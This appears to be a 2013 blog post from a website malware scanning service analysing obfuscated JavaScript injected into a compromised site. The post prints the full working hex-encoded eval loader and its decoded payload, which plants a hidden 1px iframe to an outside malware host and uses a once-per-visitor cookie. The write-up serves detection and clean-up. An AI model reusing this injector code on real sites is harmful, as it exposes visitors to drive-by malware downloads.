Sunday, April 28, 2013

Website hosts malicious JavaScript code injecting iframes


Obfuscated malicious JavaScript code injects iframe to remote .php file 

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Sat Apr 27 21:23:39 2013
Infected website's files: 4
Website malware scan report link: http://goo.gl/avVMa


Quttera | Online Website Malware Scanner
Quttera | Online Website Malware Scanner


Malicious obfuscated JavaScript injection detected
Malicious obfuscated JavaScript injection detected



Malware entry


Malware entry details.

Beautified script



  1. aq = "0x";
  2. ff = String;
  3. ff = ff.fromCharCode;
  4. zz = 3;
  5. try {
  6.     document.body ^= ~1;
  7. } catch (z1z1) {
  8.     v = 123;
  9.     vzs = 0;
  10.     try {
  11.         document;
  12.     } catch (q) {
  13.         vzs = 1;
  14.     }
  15.     if (!vzs) e = eval;
  16.     if (1) {
  17.         f ="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,72,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,72,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,6b,5d,6a,6e,5b,67,65,26,68,64,27,59,64,64,5d,5f,6a,67,27,5b,67,6d,66,6c,5d,6a,26,68,60,68,1f,33,5,2,18,18,18,18,5f,72,26,6b,6c,71,64,5d,26,68,67,6b,61,6c,61,67,66,18,35,18,1f,59,5a,6b,67,64,6d,6c,5d,1f,33,5,2,18,18,18,18,5f,72,26,6b,6c,71,64,5d,26,5a,67,6a,5c,5d,6a,18,35,18,1f,28,1f,33,5,2,18,18,18,18,5f,72,26,6b,6c,71,64,5d,26,60,5d,61,5f,60,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,5f,72,26,6b,6c,71,64,5d,26,6f,61,5c,6c,60,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,5f,72,26,6b,6c,71,64,5d,26,64,5d,5e,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,5f,72,26,6b,6c,71,64,5d,26,6c,67,68,18,35,18,1f,29,68,70,1f,33,5,2,5,2,18,18,18,18,61,5e,18,20,19,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,5f,72,1f,21,21,18,73,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,6f,6a,61,6c,5d,20,1f,34,5c,61,6e,18,61,5c,35,54,1f,5f,72,54,1f,36,34,27,5c,61,6e,36,1f,21,33,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,5f,72,1f,21,26,59,68,68,5d,66,5c,3b,60,61,64,5c,20,5f,72,21,33,5,2,18,18,18,18,75,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,4b,5d,6c,3b,67,67,63,61,5d,20,5b,67,67,63,61,5d,46,59,65,5d,24,5b,67,67,63,61,5d,4e,59,64,6d,5d,24,66,3c,59,71,6b,24,68,59,6c,60,21,18,73,5,2,18,6e,59,6a,18,6c,67,5c,59,71,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,6e,59,6a,18,5d,70,68,61,6a,5d,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,61,5e,18,20,66,3c,59,71,6b,35,35,66,6d,64,64,18,74,74,18,66,3c,59,71,6b,35,35,28,21,18,66,3c,59,71,6b,35,29,33,5,2,18,5d,70,68,61,6a,5d,26,6b,5d,6c,4c,61,65,5d,20,6c,67,5c,59,71,26,5f,5d,6c,4c,61,65,5d,20,21,18,23,18,2b,2e,28,28,28,28,28,22,2a,2c,22,66,3c,59,71,6b,21,33,5,2,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,18,35,18,5b,67,67,63,61,5d,46,59,65,5d,23,1a,35,1a,23,5d,6b,5b,59,68,5d,20,5b,67,67,63,61,5d,4e,59,64,6d,5d,21,5,2,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,23,18,1a,33,5d,70,68,61,6a,5d,6b,35,1a,18,23,18,5d,70,68,61,6a,5d,26,6c,67,3f,45,4c,4b,6c,6a,61,66,5f,20,21,18,23,18,20,20,68,59,6c,60,21,18,37,18,1a,33,18,68,59,6c,60,35,1a,18,23,18,68,59,6c,60,18,32,18,1a,1a,21,33,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,3f,5d,6c,3b,67,67,63,61,5d,20,18,66,59,65,5d,18,21,18,73,5,2,18,6e,59,6a,18,6b,6c,59,6a,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,66,59,65,5d,18,23,18,1a,35,1a,18,21,33,5,2,18,6e,59,6a,18,64,5d,66,18,35,18,6b,6c,59,6a,6c,18,23,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,23,18,29,33,5,2,18,61,5e,18,20,18,20,18,19,6b,6c,59,6a,6c,18,21,18,1e,1e,5,2,18,20,18,66,59,65,5d,18,19,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,28,24,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,21,18,21,18,21,5,2,18,73,5,2,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,75,5,2,18,61,5e,18,20,18,6b,6c,59,6a,6c,18,35,35,18,25,29,18,21,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,6e,59,6a,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,1a,33,1a,24,18,64,5d,66,18,21,33,5,2,18,61,5e,18,20,18,5d,66,5c,18,35,35,18,25,29,18,21,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,64,5d,66,5f,6c,60,33,5,2,18,6a,5d,6c,6d,6a,66,18,6d,66,5d,6b,5b,59,68,5d,20,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,64,5d,66,24,18,5d,66,5c,18,21,18,21,33,5,2,75,5,2,61,5e,18,20,66,59,6e,61,5f,59,6c,67,6a,26,5b,67,67,63,61,5d,3d,66,59,5a,64,5d,5c,21,5,2,73,5,2,61,5e,20,3f,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,21,35,35,2d,2d,21,73,75,5d,64,6b,5d,73,4b,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,24,18,1f,2d,2d,1f,24,18,1f,29,1f,24,18,1f,27,1f,21,33,5,2,5,2,72,72,72,5e,5e,5e,20,21,33,5,2,75,5,2,75"["split"](",");
  18.     }
  19.     w = f;
  20.     s = [];
  21.     if (window.document) for (= 2 - 2; - i + 1368 != 0; i += 1) {
  22.             j = i;
  23.             if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 8);
  24.     }
  25.     xz = e;
  26.     if (window.document) xz(s)
  27. }



Malicious payload


Decoded payload generates hidden iframe to http://servcom.pl/allegro/counter.php


  1. <script>
  2. function zzzfff() {
  3.     var gz = document.createElement('iframe');
  4.     gz.src = 'http://servcom.pl/allegro/counter.php';
  5.     gz.style.position = 'absolute';
  6.     gz.style.border = '0';
  7.     gz.style.height = '1px';
  8.     gz.style.width = '1px';
  9.     gz.style.left = '1px';
  10.     gz.style.top = '1px';
  11.     if (!document.getElementById('gz')) {
  12.         document.write('<div id=\'gz\'></div>');
  13.         document.getElementById('gz').appendChild(gz);
  14.     }
  15. }
  16. function SetCookie(cookieName, cookieValue, nDays, path) {
  17.     var today = new Date();
  18.     var expire = new Date();
  19.     if (nDays == null || nDays == 0) nDays = 1;
  20.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  21.     document.cookie = cookieName + "=" + escape(cookieValue)
  22.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  23. }
  24. function GetCookie(name) {
  25.     var start = document.cookie.indexOf(name + "=");
  26.     var len = start + name.length + 1;
  27.     if ((!start) &&
  28.     (name != document.cookie.substring(0, name.length)))
  29.     {
  30.         return null;
  31.     }
  32.     if (start == -1) return null;
  33.     var end = document.cookie.indexOf(";", len);
  34.     if (end == -1) end = document.cookie.length;
  35.     return unescape(document.cookie.substring(len, end));
  36. }
  37. if (navigator.cookieEnabled)
  38. {
  39.     if (GetCookie('visited_uq') == 55) {} else {
  40.         SetCookie('visited_uq', '55', '1', '/');
  41.         zzzfff();  /* iframe injection */
  42.     }
  43. }
  44. </script>


Blacklisting status


Clean on Google Safe Browsing.

On virustotal.com only Sophos detected the redirect URL as Malicious.


Cropped snapshot from Virustotal report


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.